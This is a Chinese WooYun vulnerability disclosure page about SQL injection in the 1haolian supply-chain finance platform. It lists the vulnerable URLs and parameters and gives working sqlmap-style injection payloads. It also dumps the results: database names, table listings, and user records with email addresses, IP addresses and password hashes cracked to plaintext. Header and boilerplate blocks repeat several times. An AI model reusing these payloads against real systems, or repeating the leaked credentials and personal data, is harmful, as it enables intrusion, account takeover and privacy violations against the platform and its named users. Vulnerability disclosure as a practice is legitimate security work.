金融安全之1号链中国首家供应链金融风控平台全网数据沦陷(合集)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0166042

漏洞标题：金融安全之1号链中国首家供应链金融风控平台全网数据沦陷(合集)

漏洞作者：路人甲

提交时间：2015-12-30 15:40

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-30：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-02-12：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

金融安全之1号链中国首家供应链金融风控平台全网数据沦陷(合集)

详细说明：

http://www.1haolian.com/yhlnew/NewInfos.aspx?id=2617
http://www.1haolian.com/yhlnew/AppliancesDataAnalysis.aspx?type=ya&doctype=1&owntype=1
http://tvgo.1haolian.com/etvshop/ICanSupplyinfoManage.aspx?key=88952634&page=1
http://tvgo.1haolian.com/app/news/index.aspx?q=info&list=list&kwd=

漏洞证明：

都可以跨裤
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3258' AND 3584=3584 AND 'Mzei'='Mzei
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=3258' AND 7683=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(115)+CHAR(117)+CHAR(113)+(SELECT (CASE WHEN (7683=7683) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(103)+CHAR(99)+CHAR(111)+CHAR(113))) AND 'TbMq'='TbMq
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=3258' UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(115)+CHAR(117)+CHAR(113)+CHAR(80)+CHAR(70)+CHAR(70)+CHAR(77)+CHAR(103)+CHAR(65)+CHAR(78)+CHAR(107)+CHAR(104)+CHAR(102)+CHAR(113)+CHAR(103)+CHAR(99)+CHAR(111)+CHAR(113),NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=3258'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=3258' WAITFOR DELAY '0:0:5'--
---
Place: GET
Parameter: key
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: key=88952634'); IF(3217=3217) SELECT 3217 ELSE DROP FUNCTION SHJe--&page=1 
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: key=88952634') AND 6872=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(121)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6872=6872) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(109)+CHAR(114)+CHAR(115)+CHAR(113))) AND ('mCdB'='mCdB&page=1 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: key=88952634'); WAITFOR DELAY '0:0:5'--&page=1 
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: key=88952634') WAITFOR DELAY '0:0:5'--&page=1 
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [19]:
[*] 1haolian
[*] 1haolianDCJG
[*] 1haolianetvshop
[*] 1haolianPF
[*] 1haolianTxzg
[*] im
[*] master
[*] model
[*] msdb
[*] ReportServer$SCFSERVER
[*] ReportServer$SCFSERVERTempDB
[*] SCFSupplier
[*] tempdb
[*] test888888
[*] TestYHLetvshop
[*] WeixinQiYe
[*] WeixinQiYeTest
[*] yfx2.3
[*] yhl0604
Database: yhl0604
Table: NT_User
[10 entries]
+--------------------------------------+------+-------+-------+--------+-----------+------------+----------------+-----+------+-------+--------------------+-----------------+-------+-------+-------+-------+--------+---------+--------+--------------------+---------+---------+--------------------+---------+-------------------+----------+----------------+----------+------------------------------------------+----------+----------+----------+-----------+-----------+-----------+-------------------------------------------+------------+------------+------------+-------------+------------+------------+----------------+-------------+--------------+--------------+--------------------+---------------+----------------+----------------+--------------------+----------------+----------------+------------------+---------------------+
| ID                                   | ImID | PopId | OrgID | UserID | InviterID | ProvinceID | OrganizationID | Sex | City | isRec | Email              | RegIP           | IsVip | Money | State | Click | Cnname | Mobile  | inteyb | StaffNo            | SexName | isAdmin | RegTime            | Ouscope | OrgType           | UserName | TrueName       | integral | Password                                 | Marriage | PhotoUrl | Portrait | UserCName | AttNumber | Homephone | Password2                                 | LoginTimes | LoginError | IsDisabled | VerifyCode  | MobileCode | BindMoblie | LastLoginIP    | ConfirmTime | ApproveState | MemberLevels | LastLoginTime      | ThirdUserCode | IsBusinessUser | UserCreateType | LoginErrorTime     | Departmentname | Personalstatus | ClientLoginCount | Currentpositionname |
+--------------------------------------+------+-------+-------+--------+-----------+------------+----------------+-----+------+-------+--------------------+-----------------+-------+-------+-------+-------+--------+---------+--------+--------------------+---------+---------+--------------------+---------+-------------------+----------+----------------+----------+------------------------------------------+----------+----------+----------+-----------+-----------+-----------+-------------------------------------------+------------+------------+------------+-------------+------------+------------+----------------+-------------+--------------+--------------+--------------------+---------------+----------------+----------------+--------------------+----------------+----------------+------------------+---------------------+
| NULL                                 | NULL | 0     | NULL  | 726    | 0         | 23         | NULL           | 0   | 275  | 1     | Rkk@sina.com       | 127.0.0.1       | 0     | 0.00  | 0     | 1793  | NULL   | <blank> | 0      | NULL               | NULL    | 0       | 03 18 2012 11:02AM | 3       | NULL              | ggfb     | 公告发布者          | 120      | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0        | NULL     | 863      | NULL      | 0         | NULL      | NULL                                      | 4          | 1          | NULL       | 21sV0ObGe2  | 84288      | 0          | 192.168.22.59  | NULL        | NULL         | 3            | 04 10 2012  9:56AM | NULL          | 0              | NULL           | 11  6 2014  9:56AM | NULL           | NULL           | NULL             | NULL                |
| 7e660146-9ca8-431f-9e60-a5ff70147f03 | NULL | 0     | NULL  | 1863   | 0         | 0          | <blank>        | 0   | 0    | 0     | tcx@scfchina.com   |                 | 0     | 0.00  | 0     | 158   | NULL   | <blank> | 0      | 130528939253828000 | NULL    | 0       | 08 19 2014 11:52AM | 3       | ServiceProvider   | sp055    | 谭春香            | 205      | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0        | NULL     | 0        | NULL      | 0         | NULL      | NULL                                      | 66         | 0          | NULL       | 178Sm399TZ  | 28994      | 0          | 58.240.235.146 | NULL        | 0            | 17           | 06  2 2015  1:13PM | NULL          | 1              | BackofficeUser | 11 17 2014  1:48PM | NULL           | NULL           | NULL             | NULL                |
| 186e845a-c497-405a-b8e1-056b8f6873c0 | NULL | 0     | NULL  | 35782  | 0         | 0          | <blank>        | 0   | 0    | 0     | tcx@scfchina.com   |                 | 0     | 0.00  | 0     | 402   | NULL   | <blank> | 0      | 130473601231956000 | NULL    | 0       | 06 16 2014 10:42AM | 3       | ServiceProvider   | tcx      | 广州生命之光电子科技有限公司 | 388      | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0        | NULL     | 0        | NULL      | 0         | NULL      | NULL                                      | 13         | 0          | NULL       | 178Sm399TZ  | 17853      | 0          | 58.240.235.146 | NULL        | 0            | 17           | 11 20 2014 11:52AM | NULL          | 1              | BackofficeUser | 11  6 2014  9:56AM | NULL           | NULL           | NULL             | NULL                |
| 7e660146-9ca8-431f-9e60-a5ff70147f03 | NULL | 0     | NULL  | 1863   | 0         | 0          | <blank>        | 0   | 0    | 0     | tcx@scfchina.com   |                 | 0     | 0.00  | 0     | 402   | NULL   | <blank> | 0      | 130458166547208000 | NULL    | 0       | 08 19 2014 11:52AM | 3       | BackofficeUser    | hxr      | 沈协伟            | 20       | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0        | NULL     | 0        | NULL      | 0         | NULL      | NULL                                      | 36         | 0          | NULL       | 2Cy8Pft0gB  | 83730      | 0          | 58.240.235.146 | NULL        | 0            | 20           | 11 20 2014 11:52AM | NULL          | 1              | BackofficeUser | 06  2 2015  1:13PM | NULL           | NULL           | NULL             | NULL                |
| 7e660146-9ca8-431f-9e60-a5ff70147f03 | NULL | 0     | NULL  | 1944   | 0         | 0          | <blank>        | 0   | 0    | 0     | lg036@scfchina.com |                 | 0     | 0.00  | 0     | 41    | NULL   | <blank> | 0      | 130473601231956000 | NULL    | 0       | 05 29 2014  1:57PM | 3       | LogisticsProvider | tcx      | 谭春香            | 15       | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0        | NULL     | 0        | NULL      | 0         | NULL      | f053361b97692602673852855a837d43 (scf123) | 36         | 0          | NULL       | ZvnyotFl6J  | 14386      | 0          | 58.240.235.146 | NULL        | 0            | 20           | 11 20 2014 11:52AM | NULL          | 1              | BackofficeUser | 06  2 2015  1:13PM | NULL           | NULL           | NULL             | NULL                |
| db5a0c72-4f8a-4321-a869-55c3ac09bfc1 | NULL | 0     | NULL  | 36067  | 0         | 0          | <blank>        | 1   | 0    | 0     | tcx@scfchina.com   |                 | 0     | 0.00  | 0     | 26    | NULL   | <blank> | 0      | 130699122755754000 | NULL    | 0       | 08 14 2014 11:49AM | 3       | LogisticsProvider | tcx      | 广州市伟宏电器有限公司    | 205      | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0        | NULL     | 0        | NULL      | 0         | NULL      | NULL                                      | 23         | 0          | NULL       | ZvnyotFl6J  | 74706      | 0          | 58.240.235.146 | NULL        | 0            | 37           | 06  1 2015 11:52AM | NULL          | 1              | BackofficeUser | 05 28 2015  4:24PM | NULL           | NULL           | NULL             | NULL                |
| 657cd3b4-f289-4e19-aa3b-b640826e36fb | NULL | 0     | NULL  | 1944   | 0         | 0          | <blank>        | 0   | 0    | 0     | tcx@scfchina.com   |                 | 0     | 0.00  | 0     | 122   | NULL   | <blank> | 0      | 130458166547208000 | NULL    | 0       | 08 19 2014 11:52AM | 3       | LogisticsProvider | hxr      | 广州宏扬电器设备有限公司   | 17       | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0        | NULL     | 0        | NULL      | 0         | NULL      | NULL                                      | 36         | 0          | NULL       | 3qA0ulzdzY  | 17853      | 0          | 58.240.235.146 | NULL        | 0            | 3            | 11 20 2014 11:52AM | NULL          | 1              | BackofficeUser | 06  2 2015  1:13PM | NULL           | NULL           | NULL             | NULL                |
| 6ee4bee4-a846-4cf7-b481-df35f353dfba | NULL | 0     | NULL  | 1944   | 0         | 0          | <blank>        | 0   | 0    | 0     | lg036@scfchina.com |                 | 0     | 0.00  | 0     | 41    | NULL   | <blank> | 0      | 130529852503708000 | NULL    | 0       | 08 19 2014 11:52AM | 3       | LogisticsProvider | tcx      | 广州壹泰丰盛电器有限公司   | 17       | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0        | NULL     | 0        | NULL      | 0         | NULL      | NULL                                      | 38         | 0          | NULL       | 178Sm399TZ  | 66666      | 0          | 116.21.160.68  | NULL        | 0            | 12           | 05 28 2015 10:03AM | NULL          | 1              | BackofficeUser | 05 28 2015 10:02AM | NULL           | NULL           | NULL             | NULL                |
| 7e660146-9ca8-431f-9e60-a5ff70147f03 | NULL | 0     | NULL  | 18738  | 0         | 0          | <blank>        | 0   | 0    | 0     | lg036@scfchina.com |                 | 0     | 0.00  | 0     | 26    | NULL   | <blank> | 0      | 130528939253828000 | NULL    | 0       | 08 19 2014 11:52AM | 3       | BackofficeUser    | tcx      | 安迅物流有限公司       | 205      | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0        | NULL     | 0        | NULL      | 0         | NULL      | NULL                                      | 36         | 0          | NULL       | 178Sm399TZ  | 45987      | 0          | 58.240.235.146 | NULL        | 0            | 205          | 06  2 2015  1:13PM | NULL          | 1              | BackofficeUser | 11 17 2014  1:48PM | NULL           | NULL           | NULL             | NULL                |
| 7e660146-9ca8-431f-9e60-a5ff70147f03 | NULL | 0     | NULL  | 1944   | 0         | 0          | <blank>        | 0   | 0    | 0     | sp044@scfchina.com |                 | 0     | 0.00  | 0     | 160   | NULL   | <blank> | 0      | 130524617790856000 | NULL    | 0       | 08 19 2014 11:52AM | 3       | LogisticsProvider | lg036    | 胡雪荣            | 17       | 827ccb0eea8a706c4c34a16891f84e7b (12345) | 0        | NULL     | 0        | NULL      | 0         | NULL      | f053361b97692602673852855a837d43 (scf123) | 38         | 0          | NULL       | i20xpBLgVK  | 17853      | 0          | 58.240.235.146 | NULL        | 0            | 17           | 06  1 2015 11:52AM | NULL          | 1              | BackofficeUser | 11 17 2014  1:48PM | NULL           | NULL           | NULL             | NULL                |
+--------------------------------------+------+-------+-------+--------+-----------+------------+----------------+-----+------+-------+--------------------+-----------------+-------+-------+-------+-------+--------+---------+--------+--------------------+---------+---------+--------------------+---------+-------------------+----------+----------------+----------+------------------------------------------+----------+----------+----------+-----------+-----------+-----------+-------------------------------------------+------------+------------+------------+-------------+------------+------------+----------------+-------------+--------------+--------------+--------------------+---------------+----------------+----------------+--------------------+----------------+----------------+------------------+---------------------+
back-end DBMS: Microsoft SQL Server 2008
Database: yhl0604
[530 tables]
+-----------------------------------------------------+
| AKNet_helps                                         |
| AKNnet_coms                                         |
| A_AdvancesPriceDB                                   |
| A_CostManagementDB                                  |
| A_CostManagementType                                |
| A_CostManagementUnits                               |
| A_Deliveryfa                                        |
| B2BFee                                              |
| B2BFee_Details                                      |
| Busshop_Trench                                      |
| CO_Base_BankToScf                                   |
| CO_Base_CreditManager                               |
| CO_Base_CreditManager_AmountTrace                   |
| CO_Base_CreditManager_Promote                       |
| CO_Base_CreditProduct                               |
| CO_Base_CreditProvider                              |
| CO_Pool_ApplyUserInfo                               |
| CO_Pool_CreditManagerOrder                          |
| CO_Pool_CreditUserOrder                             |
| CO_Settings_City                                    |
| CO_Settings_CreditProductFeature                    |
| CO_Settings_CreditProductType                       |
| CO_Settings_CreditProviderType                      |
| CO_Settings_Province                                |
| CashFlowAccount                                     |
| Chain_EnterpriseInfo                                |
| Chain_NameParam                                     |
| Chain_Productapplyinformation                       |
| Chain_Productinformation                            |
| Chain_ProductsImg                                   |
| Chain_ProductsInfo                                  |
| Chain_RecommendProduct                              |
Database: WeixinQiYeTest
[201 tables]
+-----------------------------------------------------+
| Crm_CustomerVisitHistory                            |
| Crm_CustomerVisitRpt                                |
| Msg_ChatHistory                                     |
| Msg_EnterpriseLatestNews                            |
| Msg_LatestNewsForCust                               |
| Msg_Message                                         |
| Msg_MessageSummary                                  |
| Msg_SendMessageHistory                              |
| Msg_UserDynamicTracking                             |
| Msg_UserWarningInfo                                 |
| Sys_Config                                          |
| Sys_DefaultImage                                    |
Database: 1haolian
[595 tables]
+-----------------------------------------------------+
| AKNet_helps                                         |
| AKNnet_coms                                         |
| A_AdvancesPriceDB                                   |
| A_CostManagementDB                                  |
| A_CostManagementType                                |
| A_CostManagementUnits                               |
| A_Deliveryfa                                        |
| B2BFee                                              |
| B2BFee_Details                                      |
| Busshop_Trench                                      |
| CO_Base_BankToScf                                   |
| CO_Base_CreditManager                               |
| CO_Base_CreditManager_AmountTrace                   |
| CO_Base_CreditManager_Promote                       |
| CO_Base_CreditProduct                               |
| CO_Base_CreditProvider                              |
| CO_Pool_ApplyUserInfo                               |
| CO_Pool_CreditManagerOrder                          |
| CO_Pool_CreditUserOrder                             |
| CO_Settings_City                                    |
| CO_Settings_CreditProductFeature                    |
| CO_Settings_CreditProductType                       |
| CO_Settings_CreditProviderType                      |
| CO_Settings_Province                                |
| CashFlowAccount                                     |
| Chain_Attention                                     |
| Chain_EnterpriseInfo                                |
| Chain_NameParam                                     |
| Chain_Productapplyinformation                       |
| Chain_Productinformation                            |
| Chain_ProductsImg                                   |
| Chain_ProductsInfo                                  |
| Chain_RecommendProduct                              |
| Chain_RecommendProductUserInfo                      |
| Chain_ShopFolder                                    |
| Chain_ShopsWebmasterRelation                        |
| Chain_SiteCaptainFolder                             |
| Chain_StationMainProductPar                         |
| Core_AssessmentItemInfo                             |
| Core_Blackboard                                     |
| Core_DataCollectInfo                                |
| Core_IndustryDataModel                              |
| Core_IndustryInfo                                   |
| Core_MerchantInfo                                   |
| Core_ProductAssessmentMap                           |
| Core_ProductDataCollectMap                          |
| Core_ProductInfo                                    |
| CreditSumPayment                                    |
| D99_CMD                                             |
| DrawBackPayment                                     |
| DrawBackPayment_Details                             |
| Etvshop_HotSowProduct                               |
| Etvshop_Product_secend_class                        |
| Etvshop_Product_third_class                         |
| Etvshop_PurchaseDemand                              |
| Etvshop_PurchaseDemandApply                         |
| Etvshop_SupplyProduct                               |
| Etvshop_SupplyProductTrenchContact                  |
| Etvshop_SupplyProductTrenchSale                     |
| Etvshop_Trench                                      |
| Etvshop_WeekSowProduct                              |
| FKBankStatements                                    |
| FM_Base_Product                                     |
| FM_Base_ProductRanking                              |
| FM_Base_Provider                                    |
| Finance_DecutFeeSalesInvoice                        |
| Finance_DecutFeeSalesInvoice_ProductDetails         |
| Finance_DecutFeeSalesInvoice_StatementLisDetails    |
| Finance_InvoiceInfo                                 |
| Finance_PaymentHistory                              |
| Finance_PaymentHistoryDetail                        |
| Finance_PrePaymentHistory                           |
| Finance_PrePaymentInfo                              |
| IndustrySector                                      |
| IndustrySector_list                                 |
| KNet_Finance_BankDirectAccess                       |
| KNet_Finance_BankPipeline                           |
| KNet_Finance_BankTransfer                           |
| KNet_Finance_ProcureReceive                         |
| KNet_Finance_ProcureReceive_Details                 |
| KNet_Finance_ProcureReturn                          |
| KNet_Finance_ProcureReturn_Details                  |
| KNet_Finance_Repayment                              |
| KNet_Finance_SalesReceive                           |
| KNet_Finance_SalesReceive_Details                   |
| KNet_Finance_SalesReturn                            |
| KNet_Finance_SalesReturn_Details                    |
| KNet_Finance_Transport                              |
| KNet_Finance_Transport_Details                      |
| KNet_Finance_WageList                               |
| KNet_Finance_WageListGet                            |
| KNet_Finance_WageSetting                            |
| KNet_Finance_WageTip                                |
| KNet_Procure_BaoPriceList                           |
| KNet_Procure_BaoPriceList_Details                   |
| KNet_Resource_OrganizationalStructure               |
| KNet_Resource_OutManage                             |
| KNet_Resource_Staff                                 |
| KNet_Sales_BaoPriceList                             |
| KNet_Sales_BaoPriceList_Details                     |
| KNet_Sales_BaoPriceList_PrinterValue                |
| KNet_Sales_BaoPriceList_Printersetup                |
| KNet_Sales_BaoPriceList_fuplist                     |
| KNet_Sales_BaoPriceList_fupsetup                    |
| KNet_Sales_ClientAppseting                          |
| KNet_Sales_ClientList                               |
| KNet_Sales_ClientList_AuthList                      |
| KNet_Sales_ContractList                             |
| KNet_Sales_ContractList_Details                     |
| KNet_Sales_ContractList_PrinterValue                |
| KNet_Sales_ContractList_Printersetup                |
| KNet_Sales_OutWareList                              |
| KNet_Sales_OutWareList_Details                      |
| KNet_Sales_OutWareList_FlowList                     |
| KNet_Sales_OutWareList_PrinterValue                 |
| KNet_Sales_OutWareList_Printersetup                 |
| KNet_Sales_PickupInfo                               |
| KNet_Sales_ReturnList                               |
| KNet_Sales_ReturnList_Details                       |
| KNet_Sales_ReturnList_FlowList                      |
| KNet_Sales_ReturnList_PrinterValue                  |
| KNet_Sales_ReturnList_Printersetup                  |
| KNet_Static_Area                                    |
| KNet_Static_City                                    |
| KNet_Static_Province                                |
| KNet_Static_Yd                                      |
| KNet_Static_logs                                    |
| KNet_Sys_AuthorityTable                             |
| KNet_Sys_AuthorityUserGroup                         |
| KNet_Sys_AuthorityUserGroupSetup                    |
| KNet_Sys_Authority_AuthList                         |
| KNet_Sys_Bank                                       |
| KNet_Sys_BigCategories                              |
| KNet_Sys_CheckMethod                                |
| KNet_Sys_CheckNotes                                 |
| KNet_Sys_Config                                     |
| KNet_Sys_ProcurePack                                |
| KNet_Sys_ProcureType                                |

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0166042

漏洞标题：金融安全之1号链中国首家供应链金融风控平台全网数据沦陷(合集)

相关厂商：1号链

漏洞作者：路人甲

提交时间：2015-12-30 15:40

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0166042

漏洞标题：金融安全之1号链中国首家供应链金融风控平台全网数据沦陷(合集)

相关厂商：1号链

漏洞作者： 路人甲

提交时间：2015-12-30 15:40

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0166042"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云